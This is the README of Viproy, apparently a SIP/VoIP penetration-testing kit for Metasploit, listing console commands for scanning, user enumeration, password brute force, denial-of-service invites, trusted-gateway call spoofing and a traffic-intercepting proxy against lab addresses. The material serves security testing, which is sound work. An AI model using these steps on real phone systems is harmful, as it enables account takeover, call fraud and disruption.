#Viproy - VoIP Penetration Testing Kit SIP and NGN Services Testing Modules for Metasploit Framework #Homepage of Project http://viproy.com/voipkit
I will publish a SIP Pen-test guide soon at viproy.com/voipkit
Basic Usage of Modules are presented below, it can be used before guide. All modules have DEBUG and VERBOSE supports #Preparing Test Network VulnVOIP is vulnerable SIP server, you can use it for tests
VulnVOIP : http://www.rebootuser.com/?cat=371
#Installation Copy "lib" and "modules" folders' content to Metasploit Root Directory.
Mixins.rb File (lib/msf/core/auxiliary/mixins.rb) Should Contain This Line
require 'msf/core/auxiliary/sip'
#Sample Usage Video (Video) http://www.youtube.com/watch?v=1vDTujNVKGM #Hacking Trust Relationships of SIP/NGN Gateways (Video) http://www.youtube.com/watch?v=BVJq2yrHYhI #Hacking Trust Relationships Between SIP Gateways (Video) http://viproy.com/files/siptrust.pdf #Global Settings setg CHOST 192.168.1.99 #Local Host
setg CPORT 5099 #Local Port
setg RHOSTS 192.168.1.1-254 #Target Network
setg RHOST 192.168.1.201 #Target Host
#Basic Usage of OPTIONS Module
use auxiliary/scanner/sip/vsipoptions
show options
set THREADS 255
run
#Basic Usage of REGISTER Module
use auxiliary/scanner/sip/vsipregister
show options
run
set LOGIN true
set USERNAME 101
set PASSWORD s3cur3
run
#Basic Usage of INVITE Module
use auxiliary/scanner/sip/vsipinvite
set FROM 2000
set TO 1000
run
set LOGIN true
set FROM 102
set USERNAME 102
set PASSWORD letmein123
run
set DOS_MODE true
set NUMERIC_USERS true
set NUMERIC_MIN 200
set NUMERIC_MAX 205
run
#Basic Usage of ENUMERATOR Module
use auxiliary/scanner/sip/vsipenumerator
show options
unset USERNAME
set USER_FILE /tmp/files/users2
set VERBOSE false
set METHOD SUBSCRIBE
run
unset USER_FILE
set METHOD SUBSCRIBE
set NUMERIC_USERS true
set NUMERIC_MAX 2300
run
set METHOD REGISTER
run
#Basic Usage of BRUTE FORCE Module use auxiliary/scanner/sip/vsipbruteforce
show options
set RHOST 192.168.1.201
set USERNAME 2000
set PASS_FILE /tmp/files/passwords
set VERBOSE false
run
unset USERNAME
set USER_FILE /tmp/files/users2
run
unset USER_FILE
set NUMERIC_USERS true
set NUMERIC_MAX 500
run
#Basic Usage of Trust Analyzer Module use auxiliary/scanner/sip/vsiptrust
show options
set SRC_RHOSTS 192.168.1.200-210
set SRC_RPORTS 5060
set SIP_SERVER 192.168.1.201
set INTERFACE eth0
set TO 101
run
show options
set ACTION CALL
set SRC_RHOSTS 192.168.1.202
set FROM James Bond
run
#Basic Usage of SIP Proxy Module use auxiliary/scanner/sip/vsipproxy
show options
set PRXCLT_PORT 5060
set PRXCLT_IP 192.168.1.99
set PRXSRV_PORT 5089
set PRXSRV_IP 192.168.1.99
set CLIENT_IP 192.168.1.120
set CLIENT_PORT 5060
set SERVER_IP 192.168.1.201
set SERVER_PORT 5060
set CONF_FILE /tmp/sipproxy_replace.txt
set LOG true
set VERBOSE false
run